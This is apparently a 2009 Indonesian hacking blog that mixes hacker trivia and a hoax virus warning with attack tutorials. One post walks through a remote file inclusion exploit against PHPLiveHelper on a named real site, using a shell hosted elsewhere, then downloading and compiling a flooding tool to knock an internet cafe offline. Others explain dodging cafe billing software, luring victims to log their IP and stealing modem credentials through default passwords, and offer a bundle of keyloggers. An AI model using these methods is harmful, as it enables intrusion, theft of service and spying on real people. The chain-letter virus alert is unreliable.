28 September 2009

Melacak IP Address Pengirim Email

Sering kali kita menerima pesan yang masuk ke alamat email bahkan pesan yang berupa SPAM (Pesan yang di anggap Sampah biasanya berupa Iklan).Berikut merupakan Tips untuk mengetahui IP address dari manakah asal pengirim email:
Yahoo Mail.
1. Login ke account email anda ( http://mail.yahoo.com/ ).
2. Masuk ke inbox dan buka salah satu email yang ingin anda lihat.
3. Pada pojok kanan bawah cari menu tulisan “Full Headers” dan klik tulisan tersebut.
4. Maka anda bisa mengetahui ip address pengirim email dan info detail yang lain.


Gmail / Google Mail.
1. Login ke account email anda ( http://gmail.com/ ).
2. Masuk ke inbox
3. Buka salah satu email yang ingin anda lihat,
4. Lihat kanan di bagian atas ada pilihan Reply, terus disamping tulisan Reply ada tanda panah ke bawah, klik tanda panah tersebut dan pilih Show Original.
5. Maka anda bisa mengetahui ip address pengirim email dan info detail yang lain.

Hotmail.
1. Login ke account email anda ( http://hotmail.com/ ).
2. Buka salah satu email yang ingin anda lihat
3. Klik kanan email tersebut dan pilih View Source.
4. Maka anda bisa mengetahui ip address pengirim email dan info detail yang lain.

Outlook Express.
1. Buka program Outlook Express dan login ke email anda.
2. Klik kanan pada salah satu email yang ingin anda lihat.
3. Klik menu Properties.
4. Klik tab Detail.
5. Maka anda bisa mengetahui ip address pengirim email dan info detail yang lain.

Microsoft Outlook.
1. Buka program Outlook Express dan login ke email anda.
2. Klik kanan pada salah satu email yang ingin anda lihat dan pilih Options
3. Maka anda bisa mengetahui ip address pengirim email dan info detail yang lain.

Legenda Hacker Dunia

Inilah daftar para legenda hacker yang pernah mengguncang dunia internet di dunia. Beberapa diantaranya telah pensiun atau meninggal.


1. Richard Stallman

Nickname : tidak ada (tidak ada yang harus disembunyikan)

Salah seorang 'Old School Hacker', bekerja pada lab Artificial
Intelligence MIT. Merasa terganggu oleh software komersial dan dan
hak cipta pribadi. Akhirnya mendirikan GNU (baca: guhNew) yang
merupakan singkatan dari GNU NOT UNIX.
Menggunakan komputer pertama sekali pada tahun 1969 di IBM New York
Scintific Center saat berumur 16 tahun.

-------------------------

2. Dennis Ritchie dan Ken Thomson

Nickname : dmr dan ken

Dennis Ritchie adalah seorang penulis bahasa C, bersama Ken Thomson
menulis sistem operasi UNIX yang elegan.

---------------------------

3. John Draper

Nickname : Cap'n Crunch

Penemu nada tunggal 2600 Herz menggunakan peluit plastik yang
merupakan hadiah dari kotak sereal. Merupakan pelopor penggunaan
nada 2600 Hz dan dikenal sebagai Phone Phreaker (Phreaker, baca:
frieker)

Nada 2600 Hz digunakan sebagai alat untuk melakukan pemanggilan
telepon gratis. Pada pengembangannya, nada 2600 Hz tidak lagi
dibuat dengan peluit plastik, melainkan menggunakan alat yang
disebut 'Blue Box'.

------------------------------

4. Mark Abene

Nickname : Phiber Optik

Sebagai salah seorang 'Master of Deception' phiber optik
menginspirasikan ribuan remaja untuk mempelajari sistem internal
telepon negara. Phiber optik juga dinobatkan sebagai salah
seorang dari 100 orang jenius oleh New York Magazine.

Menggunakan komputer Apple ][, Timex Sinclair dan Commodore 64.
Komputer pertamanya adalah Radio Shack TRS-80 (trash-80).

---------------------------

5. Robert Morris

Nickname : rtm

Seorang anak dari ilmuwan National Computer Security Center -
merupakan bagian dari National Security Agencies (NSA) -. Pertama
sekali menulis Internet Worm yang begitu momental pada tahun 1988.
Meng-infeksi ribuan komputer yang terhubung dalam jaringan.

---------------------------

6. Kevin Mitnick

Nickname : Condor

Kevin adalah hacker pertama yang wajahnya terpampang dalam
poster 'FBI Most Wanted'.

Kevin juga seorang 'Master of Deception' dan telah menulis buku
yang berjudul 'The Art of Deception'. Buku ini menjelaskan berbagai
teknik social engineering untuk mendapatkan akses ke dalam sistem.

--------------------------

7. Kevin Poulsen

Nickname : Dark Dante

Melakukan penipuan digital terhadap stasiun radio KIIS-FM,
memastikan bahwa ia adalah penelpon ke 102 dan memenangkan porsche
944 S2.

-------------------------

8. Johan Helsingius

Nickname : julf

Mengoperasikan anonymous remailer paling populer didunia.

-------------------------

9. Vladimir Levin

Nickname : tidak diketahui

Lulusan St. Petersburg Tekhnologichesky University. Menipu komputer
CitiBank dan meraup keuntungan 10 juta dollar. Ditangkap Interpol
di Heathrow Airport pada tahun 1995

------------------------

10. Steve Wozniak

Nickname : ?

Membangun komputer Apple dan menggunakan 'blue box' untuk
kepentingan sendiri.

------------------------
11. Tsutomu Shimomura

Nickname : ?

Berhasil menangkap jejak Kevin Mitnick.

------------------------

12. Linus Torvalds

Nickname : ?

Seorang hacker sejati, mengembangkan sistem operasi Linux yang
merupakan gabungan dari 'LINUS MINIX'. Sistem operasi Linux telah
menjadi sistem operasi 'standar' hacker. Bersama Richard Stallman
dengan GNU-nya membangun Linux versi awal dan berkolaborasi dengan
programmer, developper dan hacker seluruh dunia untuk
mengembangkan kernel Linux.

-------------------------

13. Eric Steven Raymond

Bapak hacker. Seorang hacktivist dan pelopor opensource movement.
Menulis banyak panduan hacking, salah satunya adalah: 'How To
Become A Hacker' dan 'The new hacker's Dictionary'. Begitu
fenomenal dan dikenal oleh seluruh masyarakat hacking dunia.

Menurut Eric, "dunia mempunyai banyak persoalan menarik dan
menanti untuk dipecahkan."

---------------------------

14. Ian Murphy

Nickname : Captain Zap

Ian Muphy bersama 3 orang rekannya, melakukan hacking ke dalam
komputer AT&T dan menggubah seting jam internal-nya. Hal ini
mengakibatkan masyarakat pengguna telfon mendapatkan diskon
'tengah malam' pada saat sore hari, dan yang telah menunggu hingga
tengah malam harus membayar dengan tagihan yang tinggi.




Jika Anda ingin menjadi seorang Hacker, belajarlah dengan keras dan jangan pernah menyerah!
Copyleft @adiepatie inc.

Virus Fecebook

Sebuah virus baru sudah ditemukan, dan digolongkan oleh Microsoft sebagai yang
paling merusak!
Virus itu baru ditemukan pada hari Minggu siang yang lalu oleh McAfee, dan belum
ditemukan vaksin untuk mengalahkannya.

Virus ini merusak Zero dari Sektor hard disc, yang menyimpan fungsi
informasi-informasi terpenting. Virus ini berjalan sebagai berikut : ·

Secara otomatis virus ini akan terkirim ke semua nama dalam daftar alamat anda
dengan judul :
"Sebuah Kartu Untuk Anda"(Une Carte Pour Vous , atau A Card For You)

Begitu kartu virtual itu terbuka, virus itu akan membekukan komputer sehingga
penggunanya harus memulainya kembali; kalau anda menekan CTRL+ALT+DEL atau
perintah untuk restart, virus itu akan merusak Zero dari Sektor Boot hard disk,
sehingga hard disk akan rusak secara permanen.

Menurut CNN, virus itu dalam beberapa jam sudah menimbulkan kepanikan di New
York . Peringatan ini telah diterima oleh pegawai Microsoft sendiri.
Jangan membuka e-mail dengan judul:
"Sebuah Kartu Untuk Anda"(Une Carte Pour Vous , atau A Card For You)

Kirimkan pesan ini kepada semua teman anda. Saya rasa bahwa sebagian besar
orang, lebih suka mendapat peringatan ini 25 kali daripada tidak sama sekali.

AWAS!!! Jangan terima kontak pti_bout_de_ chou@hotmail. com.
Ini virus yang akan memformat komputer anda.

Kirimkan pesan ini ke semua orang yang ada di dalam daftar alamat anda. Kalau
anda tidak melakukannya dan salah seorang teman anda memasukkannya dalam daftar
alamatnya, komputer anda juga akan terkena


thx's...

14 Tokoh HACKER Dunia yang di segani


Hacker adalah orang yang mempelajari, menganalisa, dan selanjutnya bila menginginkan, bisa membuat, memodifikasi, atau bahkan mengeksploitasi sistem yang terdapat di sebuah perangkat seperti perangkat lunak komputer dan perangkat keras komputer seperti program komputer, administrasi dan hal-hal lainnya , terutama keamanan.

Berikut beberapa profile 14 Hacker Terbaik Dunia untuk saat ini :
1. Kevin Mitnick
Kevin adalah hacker pertama yang wajahnya terpampang dalam poster “FBI Most Wanted”.Kevin juga seorang “Master of Deception” dan telah menulis buku yang berjudul “The Art of Deception”.Buku ini menjelaskan berbagai teknik social engineering untuk mendapatkan akses ke dalam sistem.
2. Linus Torvalds
Seorang hacker sejati, mengembangkan sistem operasi Linux yang merupakan gabungan dari “LINUS MINIX”.Sistem operasi Linux telah menjadi sistem operasi “standar” hacker.Bersama Richard Stallman dengan GNU-nya membangun Linux versi awal dan berkolaborasi dengan programmer, developper dan hacker seluruh dunia untuk mengembangkan kernel Linux.
3. John Draper
Penemu nada tunggal 2600 Herz menggunakan peluit plastik yang merupakan hadiah dari kotak sereal.Merupakan pelopor penggunaan nada 2600 Hz dan dikenal sebagai Phone Phreaker (Phreaker, baca: frieker)Nada 2600 Hz digunakan sebagai alat untuk melakukan pemanggilan telepon gratis.Pada pengembangannya, nada 2600 Hz tidak lagi dibuat dengan peluit plastik, melainkan menggunakan alat yang disebut “Blue Box”.
4. Mark Abene
Sebagai salah seorang “Master of Deception” phiber optik, menginspirasikan ribuan remaja untuk mempelajari sistem internal telepon negara. Phiber optik juga dinobatkan sebagai salah seorang dari 100 orang jenius oleh New York Magazine.
Menggunakan komputer Apple , Timex Sinclair dan Commodore 64.
Komputer pertamanya adalah Radio Shack TRS-80 (trash-80).
5. Robert Morris
Seorang anak dari ilmuwan National Computer Security Center yang merupakan bagian dari National Security Agencies (NSA).
Pertama kali menulis Internet Worm yang begitu momental pada tahun 1988.
Meng-infeksi ribuan komputer yang terhubung dalam jaringan.
6. Richard Stallman
Salah seorang “Old School Hacker”, bekerja pada lab Artificial Intelligence MIT.Merasa terganggu oleh software komersial dan dan hak cipta pribadi.Akhirnya mendirikan GNU (baca: guhNew) yang merupakan singkatan dari GNU NOT UNIX.Menggunakan komputer pertama sekali pada tahun 1969 di IBM New York Scintific Center saat berumur 16 tahun.
7. Kevin Poulsen
Melakukan penipuan digital terhadap stasiun radio KIIS-FM, memastikan bahwa ia adalah penelpon ke 102 dan memenangkan porsche 944 S2.
8. Ian Murphy
Ian Muphy bersama 3 orang rekannya, melakukan hacking ke dalam komputer AT&T dan menggubah seting jam internal-nya.Hal ini mengakibatkan masyarakat pengguna telfon mendapatkan diskon “tengah malam” pada saat sore hari, dan yang telah menunggu hingga tengah malam harus membayar dengan tagihan yang tinggi.
9. Vladimir Levin
Lulusan St. Petersburg Tekhnologichesky University.Menipu komputer CitiBank dan meraup keuntungan 10 juta dollar.Ditangkap Interpol di Heathrow Airport pada tahun 1995
10. Steve Wozniak
Membangun komputer Apple dan menggunakan “blue box” untukkepentingan sendiri.
11. Tsutomu Shimomura
Berhasil menangkap jejak Kevin Mitnick.
12. Dennis Ritchie dan Ken Thomson
Dennis Ritchie adalah seorang penulis bahasa C, bersama Ken Thomson menulis sistem operasi UNIX yang elegan.
13. Eric Steven Raymond
Bapak hacker. Seorang hacktivist dan pelopor opensource movement.Menulis banyak panduan hacking, salah satunya adalah: “How To Become A Hacker” dan “The new hacker’s Dictionary”.
Begitu fenomenal dan dikenal oleh seluruh masyarakat hacking dunia.Menurut Eric, “dunia mempunyai banyak persoalan menarik danmenanti untuk dipecahkan”.
14. Johan Helsingius
Mengoperasikan anonymous remailer paling populer didunia

27 Agustus 2009

Tingkatan Hacking

Setiap pelaku TI atau praktisi hacking itu
sendiri mendefenisikan konsep 'HACKING' yang berbeda.
Tidak tertutup kemungkinan untuk terjadi perbedaan pendapat
terhadap konsep yang di makhsud, namun cukup jadikan
perbedaan pendapat sebagai sebuah kekayaan pemikiran.
Dalam perjalanan menuju pendewasaan, perubahan pola pikir dan
kemampuan teknik, setiap manusia yang memasuki wilayah hacking akan
melewati beberapa tingkatan.

1. Si Dungu
Saya rasa tidak berlebihan untuk menyebut masyarakat pada tingkatan
ini dengan istilah dungu. Mereka hanya memiliki kemampuan teknis
komputer yang rendah dan mengenal hacking dari surat kabar, bahwa
hacker adalah seorang penjahat elektronik.
Bahkan beberapa diantara mereka juga menulis di surat kabar dalam
hal dan konsep yang sama.

2. Lamer
Lamer merupakan sebuah fenomenal awal remaja yang tertarik
mempelajari hacking. Mereka mempunyai kemampuan komputer standar
dan sedikit lebih banyak mendapat informasi.
Mereka mencoba mencari petunjuk serangan praktis. Baik dari e-zine
maupun melalui diskusi IRC (Chatting). Serangan dilakukan dengan
trojan, sebuah remote administration tool yang memberikan akses
terhadap mesin yang telah terinfeksi.
Lamer juga melakukan benyak hal-hal tidak berguna, seperti
tukar-menukar nomor kartu kredit, dan tukar-menukar password
website porno komersial.
Hacker yang kompeten, atau remaja yang berhasil lolos dari
'seleksi alam' akan melalui masa ini dengan begitu cepat memasuki
wilayah penuh keingintahuan.

3. Wannabe
Wannabe hacker menganggap hacking lebih sebagai philosophy, atau
seni kehidupan. Mereka mulai membaca teknik-teknik hacking dasar
dan melakukan searching (pencarian) dokumen-dokumen hack yang lebih
serius. Wannabe telah menunjukkan antusiasnya dalam hacking dan
mulai meninggalkan dunia lamer yang penuh kebodohan.

4. Larva
Perjalanan penuh perjuangan menjadi kupu-kupu. Larva telah
disibukkan dengan berbagai pertanyaan bagaimana benda-benda
bekerja ? Bagaimana dunia bekerja. Larva adalah step terpenting
dalam pembentukan jati diri hacker. Mereka menemukan cara untuk
membuat eksploits sendiri. Mencoba melakukan penetrasi sistem tanpa
melakukan pengerusakan, karena mereka tahu, pengerusakan sistem
adalah cara termudah bagi mereka (sysadmin dan polisi) untuk
menangkap jejak sang larva.

5. Hacker
Sebuah keindahan, naluri, karunia tuhan terhadap orang-orang
yang berjuang. Akhirnya tingkatan tertinggi dari budaya digital
telah dicapai. Sebuah dunia baru menanti. Dunia hacking !!
Sesunguhnya setiap orang tidak akan tau kapan pastinya ia menjadi
hacker. Sama halnya dengan anda tidak pernah tau pasti kapan anda
tertidur. Hal terpenting adalah terus belajar dan mengembangkan
pengetahuan. Saat anda beristirahat sejenak dan mengenang kembali
.. anda telah menjadi hacker.
Kemampuan spesial.
Hacker dalam tahap pendewasaannya akan mengalami spesialisasi
skil/kemampuan. Mereka akan dikenal sebagai:
1. Wizard
Yaitu seseorang yang memiliki pengetahuan yang begitu banyak
terhadap subyek tertentu.
2. Guru
Seseorang yang tau apapun tehadap subyek tertentu. Mereka
mengetahui fitur-fitur tak terdokumentasi. Trik-trik pengembangan,
dan teknik-teknik mengalahkan keterbatasan - limit -
Hacker sejati mengenal kebodohannya dan terus mengembangkan diri untuk
mengatasi semua kebodohannya. Dan dalam perjalanan itu alam mengadakan
seleksi, siapakah yang mampu bertahan ?

02 Agustus 2009

Hapus Billing Warnet

Ini yang aku dapat dikasih tau sama om google
Saat kita mulai menyalakan komputer di warnet yang pertama muncul saat windows dimulai adalah login screen client billing yang menutupi seluruh area windows. Fungsi Alt+Tab dan Ctrl+Alt+Del biasanya ikut-ikutan di-disable untuk memaksa kita login melalui program billing itu.
Sebenarnya saat kita menghadapi login screen itu komputer sudah siap dijalankan. Hanya terhalang oleh screen login yang menyebalkan itu. NaahâE¦ udah tau apa yang bakal saya jelasin ? Kalo udah tau, brenti aja bacanya. Daripada mati kebosanan
Yess.. betul sekali. Yang perlu kita lakukan hanyalah menyembunyikan jendela login itu tanpa perlu login. Ada banyak progie buatnyembunyiin window, salah satunya ZHider. Saya hanya akan menjelaskan penggunaan ZHider. Bagi yang menggunakan progie laen silakan baca manualnya, tapi yang perlu diperhatikan adalah progie yang anda gunakan harus bisa show/hide window pake hotkey coz windows kita kan ditutupi sama login screen sialan itu.
Yang harus disiapkan:
1. Program ZHider. Cari sendiri pake tante Google. Ukurannya kecil kok, ga sampe setengah isi disket.
2. Muka bego
3. Mental yang kuat
Langkah-langkahnya:
01. Masuk warnet dan pasang muka bego biar ga dicurigai operator
02. Pastikan selain box/bilik yang kita tempati masih ada box lain yang kosong. Biar ga dicurigai juga sih.
03. Usahakan cari tempat yang jauh dari op, supaya ga ketahuan box kamu kosong apa nggak.
04. Nyalakan kompi dihadapan anda bila masih dalam keadaan mati.
05. Saat masuk login screen, login aja seperti biasa.
06. Jalankan ZHider yang sudah disiapkan di disket/flashdisk. Kalo belom ada, cari aja pake google.
07. Setelah ZHider dijalankan langsung aja logout.
08. Naah, di login screen ini kita mulai aksi mendebarkan kita. Tekan Ctrl+Alt+Z.. Jreeeng, login screen telah menghilang !!!
09. Browsinglah sepuasnya, tapi tetap pastikan ada box lain yang kosong. Kan aneh kalau ada yang masuk warnet, dia lihat udah penuh. Padahal di billing server kelihatan masih ada yang belum login.
10. Kalo sudah puass tekan Ctrl+Alt+x untuk memunculkan kembali login screen yang menghilang entah kemana
11. Login seperti biasa dan browsing beberapa menit sampai penunjuk tarif sampai ke angka yang kita kehendaki. Ini supaya ga dicurigai.
12. Logout. SIapkan muka bego, lalu bayar tarif.
Cara ini lebih mudah dilalukan bila si operator ga terlalu kenal sama kamu. Apalagi bila si op sering keluyuran.
Ini beberapa hotkey ZHider yang bisa digunakan, untuk hotkey lainnya silakan baca file readme yang disertakan bersama zhider
CTRL+ALT+Z Menyembunyikan jendela aktif
CTRL+ALT+X Menampilkan kembali semua jendela yang disembunyikan
CTRL+ALT+L Menampilkan dialog zhider
CTRL+ALT+M Menampilkan kembali semua jendela yang disembunyikan, dan juga menutup zhider.
Cara 2:
Nyalain kompi .Setelah loading windows tekan tahan Ctrl+Alt+Del sebelum keluar jendela billing(harus cepet coz jendela billing muncul hanya 2 detik setelah loading windows). Setelah kluar task manager klik "End Task"™ pada aplikasi "client 008".
Cara 3:
Menggunakan software "Billing Hack". Software ini bahkan bisa mereset time billing.
Bisa juga sebelum nyalain kompi cabut kabel LAN di belakang CPU. Biar gak terlalu mencurigakan, cabut kabelnya sambil pura-pura pasang USB ato Flash Disk (sambil nyelam mancing ikan gitu deh pepatahnya).Trus nyalain kompi tunggu sampai jendela billing keluar. Klik "Admin" masukkan password default "008". Trus di Exit Client&Password masukkan juga password 008. Abis tu, setelah muncul kotak yang terakhir cari tanda ****** yang letaknya paling bawah kiri, delet tanda tsb dan terakhir klik 'Exit Client'™ yang terletak di sebelah kanan tanda yang telah kita hapus tadi.
Kalo mo download program Zhider nya nih alamatnya

DOWNLOAD ZHIDER

30 Juli 2009

Trik nembak IP

Penulis mengaggap bahwa temen-temen yang baca tulisan ini sudah bisa menginjek-injek
Target, dan mengerti sedikit tentang pengalamatan IP Address. Karena kalau belum 'biasa' injek, pasti
akan malu-malu dan gugup(xixixixixi) dan tentang Pengalamatan IP Address kalau ga tau sama sekali tentu
target yang akan lo tembak ga' bakal disconnect atau down.
Nah, kalau udah bisa inject dan mengerti sedikit tentang pengalamatan IP, langsung dech...

0o0 Pertama-tama Lo harus punya server yang siap inject [Klo' blom punya cari aja di Google.
Penulis punya nich sedikit target dan Bug-bug yang 'Mudah-mudahan' masih bisa dipake di sini

0o0 Untuk contoh ini gw pake Bug PHPLiveHelper dan Keyword untuk mencari targetnya di Google Gw coba
allinurl:"/PHPLiveHelper/*.php"

0o0 Gw coba salah satu hasil pencarian dari Google, yaitu http://www.maldivesrds.com/phplivehelper/mail.php?
ipadd=219.83.4.68&PHPSESSID=accdc7e62171c549536495c2b40a5dd3&department=1&livename=

0o0 Hapus tulisan /mail.php?ipadd=219.83.4.68&PHPSESSID=accdc7e62171c549536495c2b40a5dd3&department=1&
livename= dan tambahkan Bug dibelakang alamat URL targetnya, sehingga alamat targetnya menjadi
http://www.maldivesrds.com/phplivehelper/initiate.php?abs_path=http://freewebs.com/th3sn0wbr4in/tusuk.htm?

0o0 Nah...bisa di-inject kan...? Kita lihat UID - nya adalah nobody(99), gapapa dech...

0o0 Cari Direktory yang bisa ditulis ama user nobody. Seperti biasa, ketik command linuxnya. Lo bisa ketik
find / -type d -perm 777 atau find / -type d -user nobody nah nanti banyak tuch yang keluar...
/* Maksud dari command 1 di atas adalah untuk mencari dari Directory paling atas '/' tipenya Directory, dengan permisi
777 (rwx) untuk siapapun, termasuk user nobody */
/* Maksud dari command 2 di atas adalah untuk mencari dari Directory paling atas '/' tipenya Directory, milik user nobody.
Karena pemilik Directory bisa melakukan apapun pada Directory miliknya */
Cari dibelakangnya ga' ada tulisan Permission Denied, copy dan paste di paste di Field Directory di PHPShell kamu
dan [Enter]. Kalau semua ada tulisan Permission Denied, coba saja Directory /tmp, karena biasanya bermode 777.

0o0 Download file untuk tembak dengan menggunakan wget. Ketik wget http://freewebs.com/th3sn0wbr4in/tembak.c.
Jika wget tidak bisa digunakan (Command not found atau denied) gunakan lwp-download.
Ketik lwp-download http://freewebs.com/th3sn0wbr4in/tembak.c dan [Enter] aja langsung.
Kalau anda menggunakan wget akan keluar keterangan di PHPShell lo, +- seperti ini :


--02:39:51-- http://freewebs.com/th3sn0wbr4in/tembak.c
=> `tembak.c'
Resolving freewebs.com... 38.119.100.2
Connecting to freewebs.com[38.119.100.2]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3,744 [text/x-csrc]

0K ... 100% 30.89 KB/s

02:39:51 (30.89 KB/s) - `Sambit.c' saved [3764/3764]

Nah, kalau udah muncul tulisan saved berarti udah kedownload filenya...
0o0 Compile file tembak.c tadi biar jadi file Executeable (kalau di WinDo$t Ekstensinya .exe kalau di Linux
tidak menggunakan Ekstensi).
Ketik gcc tembak.c -o tembak
Maksud Command di atas adalah menjalankan gcc, compile file tembak.c (Source Code C) dengan Output
file bernama tembak. Jadi nama tembak bisa lo ganti sesuai selera

0o0 Nah...sekarang, jalankan file tembak tadi. Ketik apa...?

0o0 ./tembak 219.83.4.68 80
0x01 ./ adalah Directory tempat kita menaruh file tembak
0x02 219.83.4.68 IP Warnet tempat gw maen
0x03 80 No Port. 80 untuk HTTP a.k.a Browsing
Untuk apa itu port. Stop tanya terus, buka Google! Cari yang ingin Lo cari!
0o0 Penutup
Akankah kita tetap menjadi anak kecil...? tanpa memberikan penghargaan terhadap penulis...?
atau anda masih berpegang teguh kepada pemikiran anak anak anda dengan merubah identitas
asli penulis dan kemudian mencantumkan nama anda sebagai author disini...?
Kenapa hal ini sering saya sampaikan...? karena Indonesia di mata komunitas IT luar negeri
sering dicap sebagai plagiator dan sering seenaknya mencantumkan kata `author` yang sebenarnya
mereka hanya meng-edit sedikit dari paper yang orang lain tulis, kadangkala mereka sendiri tidak
mengerti apa maksud dibalik tulisan tersebut.
( nyindir yg copas )
hehehe

By. X-Code

All about Keylogger

Bagi para lamerz maniak hacking tools pasti sering mendengar keylogger. :D. Apa sih keylogger ? Keylogger merupakan tools yang pada dasarnya memiliki sebuah fungsi untuk melakukan monitoring semua akitivitas yang dilakukan oleh user pada sebuah PC. Mulai dari merekam password yang diketikan, chatting di instant messaging, program apa saja yang dijalankan oleh user, apa yang dilakukan user pada program tersebut, dan semua yang diketikkan di keyboard hingga pergerakan mouse, bahkan beberapa keylogger yang telah lama beredar mengincludekan fasilitas pengcapture layar monitor setiap 5 menit sekali, dan outputnya adalah HTML. Ada beberapa keylogger yang cukup menarik, diantaranya ada yang dapat mengirim hasil dari monitoring aktivitas tersebut ke email sang penanam keylogger tersebut. Sehingga si penanam keylogger tersebut dapat melihat semua aktivitas yang dilakukan oleh user pada sebuahpc melalui email.
Jelas keylogger ini bersifat kontroversial seperti 2 mata pisau, positif, negatif, membangun dan menghancurkan. Tidak cukup waktu untuk mendiskusikan semua hal tersebut.
Untuk menambah koleksi hacking tools anda, :D silahkan unduh 63 keylogger terbaru  yang cukup handal ...
Berikut daftarnya :

1. 007 Keylogger Spy Software 3.873
2. Active Key Logger 2.4
3. Activity Keylogger 1.80.21
4. Activity Logger 3.7.2132
5. ActMon Computer Monitoring 5.20
6. Actual Spy 2.8
7. Advanced Invisible Keylogger v1.9
8. Advanced Keylogger 1.8
9. Ardamax Keylogger 2.9
10. BlazingTools Perfect Keylogger 1.68
11. Blazingtools Remote Logger v2.3
12. Data Doctor KeyLogger Advance v3.0.1.5
13. Local Keylogger Pro 3.1
14. ExploreAnywhere Keylogger Pro 1.7.8
15. Family Cyber Alert 4.06
16. Family Keylogger 2.80
17. Firewall bypass Keylogger 1.5
18. Free Keylogger 2.53
19. Ghost Keylogger 3.80
20. Golden Eye 4.5
21. Golden KeyLogger 1.32
22. Handy Keylogger 3.24 build 032
23. Home Keylogger 1.77
24. Inside Keylogger 4.1
25. iOpus Starr PC and Internet Monitor 3.23
26. iSpyNow v2.0
27. KeyScrambler 1.3.2
28. Keystroke Spy 1.10
29. KGB Keylogger 4.2
30. KGB Spy 3.84
31. LastBit Absolute Key Logger 2.5.283
32. Metakodix Stealth Keylogger 1.1.0
33. Network Event Viewer v6.0.0.42
34. OverSpy v2.5
35. PC Activity Monitor Professional 7.6.3
36. PC Spy Keylogger 2.3 build 0313
37. PC Weasel 2.5
38. Personal PC Spy v1.9.5
39. Power Spy 6.10
40. Powered Keylogger v2.2.1.1920
41. Quick Keylogger 2.1
42. Radar 1.0
43. Real Spy Monitor 2.80
44. Real Spy Monitor 2.80
45. Remote Desktop Spy 4.04
46. Remote KeyLogger 1.0.1
47. Revealer Keylogger Free 1.33
48. SC Keylogger Pro 3.2
49. Smart Keystroke Recorder Pro
50. Spector Pro 6.0.1201
51. SpyAnytime PC Spy 2.42
52. SpyBuddy 3.7.5
53. Spytech SpyAgent 6.02.07
54. Spytector 1.3.5
55 Stealth Key Logger 4.5
56. System keylogger 2.0.0
57. TimâE™s Keylogger 1.0
58. Tiny Keylogger 2.0
59. Total Spy 2.7
60. Windows Keylogger 5.04
61. Win-Spy Pro 8.9.109
62. XP Advanced Keylogger 2.5
63. XPCSpy Pro version 3.01
Yg mau ngoleksi tool hacking keylogger
Silahkan download di sini ...
Download Rapidshare part 1
Download Rapidshare part 2

Hacking Speedy

Sebenarnya sudah lama sekali telkom mengadakan diskon besar-besaran untuk meraih
pelanggan sebanyak-banyaknya. Udah dulu promosinya. :D
Sama dengan bug-bug yang lainnya, konfigurasi default akan membuat pihak luar yang tidak
diinginkan seperti cracker dengan mudah mengeksploitasi secara besar-besaran sehingga
memanen username dan password menjadi sesuatu yang memungkinkan sekali untuk
dilakukan. Contoh bug yang buruk, yaitu username default dan password yang default.
Sebelum ngejabarin masalah teknisnya, berikut alat-alat yang diperlukan :
· Browser Internet ( mau yang banyak bugnya, maupun yang sedikit bugnya )
· Website dengan log system flat file
· Aplikasi Instant Messaging, ex : Yahoo Messenger ( Social Engineering )
· Internet Password Asterisk Reveal ( kalo belum punya download di SINI
Langkah Pertama
Silahkan anda baca artikel
di SINI
cara memasang log system flat file. Digunakan untuk mendapatkan alamat ip dari sang
korban.
Langkah Ke Dua
Inti dari artikel ini adalah pencarian user yang akan dijadikan korban. Anda bisa
menggunakan aplikasi IRC ataupun instant messaging yang lainnya. Alangkah baiknya anda
menggunakan aplikasi IRC, seperti mIRC ataupun yang lainnya, karena fasilitas whois yang
ada didalamnya mempermudah kita untuk segera mengetahui IP sang korban, tapi pada
beberapa kasus, adakalanya user yang advanced menggunakan anonymous proxy yang
tentunya menyembunyikan IP asli miliknya. Sehingga perlu teknik social engineering yang
lebih ampuh lagi. Berikut ada sedikit percakapan antara seseorang sebagai intruder dengan
sang korban menggunakan aplikasi yahoo messenger :
adiepatie (intruder) : dah liat situs ini belom, ilmuwebsite.com ???
Sang_korban : apaan tuh ?
adiepatie (intruder) : situs keren punya orang keren, ngebahas tentang berbagai artikel
mengenai kekerenan. Coba deh liat.
Sang_korban : coba, gw liat dulu. # kena!!
adiepatie ( intruder ) : gimana keren kan ? eh, gw off dulu yah. C U
*** Situs ilmuwebsite.com tersebut, merupakan sebuah contoh situs yang anda gunakan untuk
merecord ip sang korban. Anda bisa memasang log system flat file pada situs milik anda.
Dengan mengusahakan sang korban tertarik untuk mengunjungi situs yang telah dipasang
log system flat file.
Contoh IP yang sudah dilog dalam flat file,
Waktu: Fri, 06 Jul 2007 12:47:04 +0700 | IP asli: 125.161.2.85 |
Browser: Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; Win 9x 4.90) | URL: / | Referrer: |
Proxy: | Koneksi:
Langkah Ketiga
Setelah mendapatkan alamat ip sang korban, yang perlu anda lakukan adalah membuka
browser, kemudian pada address bar isi dengan alamat ip yang telah anda dapatkan,
sebagai contoh yang saya dapatkan adalah http://125.160.#.# isikan username dengan
admin dan passwordnya admin. Jika anda beruntung, anda akan langsung dihadapkan
kepada halaman username ADSL dan tentunya password yang asterisk. Untuk membuka
password yang asterisk, anda cukup menggunakan Internet Password Asterisk Reveal.
Penanganan
Sebenarnya dengan mengganti password yang default pun itu sudah bisa mencegah teknik
seperti ini. Dan intinya password yang kuatlah yang susah untuk dimanfaatkan. Password
yang kuat ini memiliki lebih dari 8 digit, dan merupakan gabungan dari angka huruf dan
special character. Ex: ilmVw3851te --> bentuk lain dari ilmuwebsite
Sayangnya, telkom telah menerapkan system yang unique, sehingga account speedy tidak
bisa digunakan pada jaringan telepon yang berbeda. Dan tentunya anda tidak bisa men-take
over account yang sudah didapatkan. Mohon Maaf, artikel ini hanya sebagai contoh
pembelajaran.
Default password untuk setiap modem :
www.elitehackers.info/defaultpasslist.php

Membobol Warnet

Mo main-main dengan ngerubah nama warnet, alamat warnet, registrasi warnet atau ngenet
gratis? Gampang kok. Ikuti aja tutotrial di bawah ini. Inget, ini cuma buat coba-coba aja. Jangan
ngerugiin warnet dengan internet gratis! Kan yang punya butuh maem juga,hihihihihihihhi….
Caranya adalah memanfaatkan SQL Manager. Username dan password dicari nanti aja. Kalo IP
pake Netstat aja bro
caranya ::
buat file "netstat.bat" yang isinya berikut ini
====== NETSTAT.BAT ======== [don't copy paste this line]
netstat >> netstat.txt
open netstat.txt
====== END OF NETSTAT.BAT ==== [don't copy paste this line]
fungsi dari perintah ini adalah mencetak hasil dari "netstat" ke dalam sebuah file netstat.txt lalu
membuka file tersebut. hal ini perlu dilakukan karena indobilling akan melakukan close terhadap
comand prompt. (mulai deh make bahasa formal. biasa aj napa bung !!!)
nahhh .. dr hasil netstat itu, bs diliat port 3306 (port default na mySQL) lagi konek kmn.
contoh ::
========= RESULT OF NETSTAT ==================
Proto Local Address Foreign Address State
TCP 127.0.0.1:49218 Owner-PC:49219 ESTABLISHED
